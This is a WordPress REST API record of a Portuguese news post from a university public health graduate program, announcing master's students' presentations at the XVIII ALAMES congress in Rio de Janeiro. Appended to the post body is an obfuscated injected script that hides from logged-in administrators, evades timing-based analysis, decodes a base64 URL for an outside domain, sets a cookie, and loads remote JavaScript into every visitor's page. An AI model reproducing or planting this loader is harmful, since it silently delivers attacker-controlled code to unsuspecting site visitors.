{"id":1236,"date":"2025-08-21T12:26:00","date_gmt":"2025-08-21T15:26:00","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1236"},"modified":"2026-04-16T13:14:21","modified_gmt":"2026-04-16T16:14:21","slug":"xviii-congresso-latino-americano-de-medicina-social-e-saude-coletiva","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/08\/21\/xviii-congresso-latino-americano-de-medicina-social-e-saude-coletiva\/","title":{"rendered":"XVIII Congresso Latino-Americano de Medicina Social e Sa\u00fade Coletiva"},"content":{"rendered":"\n<p>\ud83d\udce2 O N\u00facleo de Estudos Psicossociais sobre Direitos Humanos e Sa\u00fade (NEPDS <a href=\"https:\/\/www.instagram.com\/nepd.s\/\">@nepd.s<\/a>) teve participa\u00e7\u00e3o marcante no XVIII Congresso Latino-Americano de Medicina Social e Sa\u00fade Coletiva (ALAMES), realizado nos dias 04 a 08 de agosto na Universidade do Estado do Rio de Janeiro (UERJ), reunindo pesquisadoras comprometidas com a produ\u00e7\u00e3o de conhecimento e a transforma\u00e7\u00e3o social.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-5-1024x576.png\" alt=\"\" class=\"wp-image-1238\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-5-1024x576.png 1024w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-5-300x169.png 300w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-5-768x432.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-5-1536x864.png 1536w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-5.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Representando o Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da UEA (PPGSC\/UEA), as mestrandas Helo\u00edsa P\u00e9rez e Polyana Pinheiro apresentaram trabalhos relevantes que abordam desde a humaniza\u00e7\u00e3o da assist\u00eancia em sa\u00fade no Amazonas at\u00e9 a promo\u00e7\u00e3o dos direitos humanos na gesta\u00e7\u00e3o e no parto.<\/p>\n\n\n\n<p>Tamb\u00e9m foi compartilhado o estudo sobre a produ\u00e7\u00e3o de sentidos sobre a fam\u00edlia em contexto de feminic\u00eddio no munic\u00edpio de Manaus \u2013 Amazonas, trazendo reflex\u00f5es fundamentais para o enfrentamento da viol\u00eancia de g\u00eanero e a valoriza\u00e7\u00e3o das redes de apoio \u00e0s fam\u00edlias.<\/p>\n\n\n\n<p>Foram dias de intensa troca de saberes, fortalecimento de v\u00ednculos acad\u00eamicos e reafirma\u00e7\u00e3o do compromisso do NEPDS com uma sa\u00fade coletiva mais humana, justa e inclusiva. \ud83d\udc9a<\/p>\n\n\n\n<p><\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83d\udce2 O N\u00facleo de Estudos Psicossociais sobre Direitos Humanos e Sa\u00fade (NEPDS @nepd.s) teve participa\u00e7\u00e3o marcante no XVIII Congresso Latino-Americano de Medicina Social e Sa\u00fade Coletiva (ALAMES), realizado nos dias 04 a 08 de agosto na Universidade do Estado do Rio de Janeiro (UERJ), reunindo pesquisadoras comprometidas com a produ\u00e7\u00e3o de conhecimento e a transforma\u00e7\u00e3o [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1237,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1236","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1236","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1236"}],"version-history":[{"count":2,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1236\/revisions"}],"predecessor-version":[{"id":1322,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1236\/revisions\/1322"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1237"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1236"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1236"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1236"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}